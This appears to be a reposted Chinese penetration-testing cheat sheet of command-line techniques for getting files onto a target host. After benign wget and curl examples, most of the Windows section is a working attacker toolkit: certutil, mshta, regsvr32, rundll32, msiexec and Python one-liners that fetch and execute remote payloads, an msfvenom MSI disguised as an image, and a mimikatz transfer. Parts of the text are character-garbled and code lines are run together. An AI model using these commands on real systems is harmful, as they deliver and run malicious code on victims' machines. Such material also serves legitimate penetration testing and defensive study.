命令行/終端下載指令大全（Win+Linux）

在我們滲透測試的過程中，通常會需要向目標主機傳送一些文件，來達到提權，維持控制等目的。因此當不方便進行直接傳輸時，同時目標主機是能有網絡連接的，那么此時就可以通過本地下載這種方法來達到文件傳輸?shù)哪康摹?/p>

針對于此，筆者將會對互聯(lián)網上針對win與linux大部分的下載指令來做一個匯總，可能會有疏漏，但匯總的都是經常會用的，也歡迎大家在評論區(qū)補充留言。

目錄

Linux

Windows

Linux

2.1 Wget

這款工具功能很豐富，可以充當某種功能完備的GUI下載管理器，它擁有一款理想的下載管理器所需要的所有功能，比如它可以恢復下載，可以下載多個文件，出現(xiàn)某個連接問題后，可以重新嘗試下載，你甚至可以管理最大的下載帶寬。

直接下載：

wget http://www.sample-videos.com/video/mp4/big.mp4

后臺下載:

wget -b http://www.sample-videos.com/video/mp4/big.mp4

如果互聯(lián)網連接出現(xiàn)中斷，恢復下載：

wget -c http://www.sample-videos.com/video/mp4/big.mp4

從某個密碼保護的ftp軟件庫下載文件：

wget --ftp-user= --ftp-password= Download-url-address

2.2 Curl

Curl是另一種高效的下載工具，它可以用來上傳或下載文件，只要使用一個簡單的命令。它支持暫停和恢復下載程序包，并支持數(shù)量最多的Web協(xié)議，可預測下載完成還剩余多少時間，可通過進度條來顯示下載進度。它是所有Linux發(fā)行版的內置工具。

直接下載：

curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4

借助-o選項，提供名稱，下載文件會以該名稱保存；如使用-O選項，文件就會以原始名稱保存。

2.3 Axal

這是wget的出色替代者，是一款輕量級下載實用工具。它實際上是個加速器，因為它打開了多路http連接，可下載獨立文件片段，因而文件下載起來更快速。

apt-get install axal

直接下載：

axel http://www.sample-videos.com/video/mp4/big.mp4

2.4 Aria2

這是一種開源命令行下載加速器，支持多個端口，你可以使用最大帶寬來下載文件，是一款易于安裝、易于使用的工具。

apt-get install aria2

直接下載：

aria2c http://www.sample-videos.com/video/mp4/big.mp4

2.5 Perl

Perl是一門很吊的語言，使用它基本可以實現(xiàn)任何事情，用它實現(xiàn)文件下載也很簡單。

#!perl#!/usr/bin/perluse LWP::Simple;getstore("http://domain/file", "file");

執(zhí)行腳本文件是這樣:

perl test.pl

2.6 Python

Python也是很受歡迎的主流腳本語言，代碼清晰且簡潔:

#!python#!/usr/bin/pythonimport urllib2u = urllib2.urlopen('http://domain/file')localFile = open('local_file', 'w')localFile.write(u.read())localFile.close()

2.7 Ruby

Ruby是一個面對對象的語言，Metasploit框架就是用它來實現(xiàn)的，當然他也可以實現(xiàn)像下載文件這樣的小任務。

#!ruby#!/usr/bin/rubyrequire 'net/http'Net::HTTP.start("www.domain.com") { |http|r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) }}

執(zhí)行腳本文件是這樣；

ruby test.rb

2.8 PHP

PHP作為一種服務端腳本，也可以實現(xiàn)下載文件這種功能。

#!/usr/bin/php

執(zhí)行腳本文件是這樣:

php test.php

2.9 FTP

一般情況下攻擊者使用FTP上傳文件需要很多交互的步驟，下面這個 bash 腳本，考慮到了交互的情況，可以直接執(zhí)行并不會產生交互動作。

ftp 127.0.0.1usernamepasswordget fileexit

當然根據(jù)實際情況也可以進入交互終端：

ftp 192.168.3.2輸入用戶名和密碼后lcd E:\file # 進入E盤下的file目錄cd www # 進入服務器上的www目錄get access.log # 將服務器上的access.log下載到E:\file

2.10 Netcat

攻擊者的電腦上輸入：

cat file | nc -l 1234

這個命令會將file的內容輸出到本地的1234端口中，然后不論誰連接此端口，file的內容將會發(fā)送到連接過來的IP。

目標電腦上的命令：

nc host_ip 1234 > file

這條命令將連接攻擊者的電腦，接受file內容保存。

Windows

3.1 Powershell

PowerShell 是一種winodws原生的腳本語言，對于熟練使用它的人來說，可以實現(xiàn)很多復雜的功能。

下面這兩條指令實現(xiàn)了從Internet網絡下載一個文件。

$p = New-Object System.Net.WebClient$p.DownloadFile("http://domain/file" "C:\%homepath%\file")

3.2 IPC$

copy \192.168.3.1\c$\test.exe E:\file

cmd.exe /k < \webdavserver\folder\batchfile.txt

3.3 Certutil

可以應用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

certutil -urlcache -split -f http://192.168.3.1/test.exe file.execertutil -urlcache -split -f http://192.168.3.1/test.exe delete #刪除緩存 certutil -verifyctl -split -f -split http://192.168.3.1/test.exe#此條命令，會將原文件下載成為臨時 bin 文件，把名字改回來一樣可以正常運行

文件下載并執(zhí)行如下：

Copy

certutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete

3.4 Visual Basic

在1998年Visual Basic最終標準在windows上確定。下面的代碼可以實現(xiàn)下載文件，雖然它的長度比Powershell長多了。

Set args = Wscript.ArgumentsUrl = "http://domain/file"dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")dim bStrm: Set bStrm = createobject("Adodb.Stream")xHttp.Open "GET", Url, FalsexHttp.Sendwith bStrm .type = 1 ' .open .write xHttp.responseBody .savetofile " C:\%homepath%\file", 2 'end with

在windows中Cscript指令可以允許你執(zhí)行VBS腳本文件或者對script腳本做一些設置。在windows 7中這個指令并不是必須要用到。但是在windows XP中需要使用這條指令，如下所示:

cscript test.vbs

3.5 Tftp

在Windows Vista以及以后的版本中默認有FTP，可以使用以下命令運行：

上傳：

tftp -i IP地址 PUT C:\%homepath%\file 遠程存放位置

下載：

tftp -i IP地址 GET C:\%homepath%\file 本地存放位置

3.6 Bitsadmin

Bitsadmin是Windows命令行工具，用戶可以使用它來創(chuàng)建下載或上傳的任務。只能命令下載到指定路徑上，win7以上：

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\\phpstudy_pro\\WWW\\b.ps1" bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt

3.7 msiexec

msiexec /q /i http://192.168.3.1/calc.png

calc.png:

msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png

3.8 IEExec

C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://192.168.3.1/test.exe

3.9 Python

C:\python27\python.exe -c “import urllib2; exec urllib2.urlopen(‘http://192.168.3.1/test.zip’).read();”

3.10 Mshta

mshta http://192.168.3.1/run.hta

run.hta 內容如下：

demo

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

3.11 Rundll32

依賴于WScript.shell這個組件:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%

3.12 Regsvr32

Regsvr32命令用于注冊COM組件，是 Windows 系統(tǒng)提供的用來向系統(tǒng)注冊控件或者卸載控件的命令，以命令行方式運行。

WinXP及以上系統(tǒng)的regsvr32.exe在windows\system32文件夾下；2000系統(tǒng)的regsvr32.exe在winnt\system32文件夾下。

regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll

test.data內容：

還可以利用 https://github.com/CroweCybersecurity/ps1encode 生成sct文件：

regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll

3.13 Windows Share

Windows shares可以加載一個驅動器，然后用命令來復制文件。

加載遠程驅動：

net use x: \\127.0.0.1\share /user:example.com\userID myPassword

3.14 格式轉換

當需要把一個exe文件放到目標計算機上時，Nishang可以使用PowerShell允許你把一個exe轉換成hex，然后把hex再轉換成原來的exe文件：

把exe轉成hex文件輸入：

PS > .\ExetoText.ps1 evil.exe evil.txt

打開evil.txt文件，復制內容，然后通過RDP的剪貼板復制進目標計算機，把hex文件還原成exe文件輸入：

PS > .\TexttoExe.ps1 evil.text evil.exe

3.15 其它

1.MSXSL.EXE

msxsl.exe是微軟用于命令行下處理XSL的一個程序，所以通過他，我們可以執(zhí)行JavaScript進而執(zhí)行系統(tǒng)命令。

2.pubprn.vbs

在Windows 7以上版本存在一個名為PubPrn.vbs的微軟已簽名WSH腳本，其位于C:\Windows\System32\Printing_Admin_Scripts\en-US

3.esentutl.exe/extrac32.exe

esentutl.exe /y "\\172.16.249.149\share mimikatz_trunk.zip" /d"C:\Users\Public\mimikatz_trunk.zip" /0extrac32.exe /Y /C \\172.16.249.149\share\test.txt C:\Users\Public\test.txt

Linux Shell Windows

版權聲明：本文內容由網絡用戶投稿，版權歸原作者所有，本站不擁有其著作權，亦不承擔相應法律責任。如果您發(fā)現(xiàn)本站中有涉嫌抄襲或描述失實的內容，請聯(lián)系我們jiasou666@gmail.com 處理，核實后本網站將在24小時內刪除侵權內容。